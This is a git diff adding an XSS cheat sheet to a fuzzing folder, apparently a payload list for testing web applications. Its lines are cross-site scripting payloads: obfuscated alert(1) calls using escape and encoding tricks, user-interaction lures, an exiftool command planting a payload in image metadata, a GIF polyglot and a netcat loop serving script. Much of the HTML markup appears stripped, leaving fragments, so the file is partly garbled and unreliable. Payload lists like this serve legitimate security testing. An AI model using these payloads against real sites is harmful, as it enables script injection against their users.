diff --git a/Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt b/Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt new file mode 100644 index 0000000..b691ce9 --- /dev/null +++ b/Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt @@ -0,0 +1,141 @@ + +"> +http://DOMAIN/PAGE.php/"> + + + + +(alert)(1) +a=alert,a(1) +[1].find(alert) +top["al"+"ert"](1) +top[/al/.source+/ert/.source](1) +al\u0065rt(1) +top['al\145rt'](1) +top['al\x65rt'](1) +top[8680439..toString(30)](1) +lose focus! +click this! +copy this! +right click this! +copy this! +double click this! +drag this! +focus this! +input here! +press any key! +press any key! +press any key! +click this! +hover this! +hover this! +hover this! +click this! +paste here! + +click +click +
+ + + + + + +
+
.gif +$ exiftool -Artist='">' FILENAME.jpeg + +GIF89a/**/=alert(document.domain)//; + +#alert(1) +#alert(1) +# + +$ while:; do echo "alert(1)" | nc -lp80; done +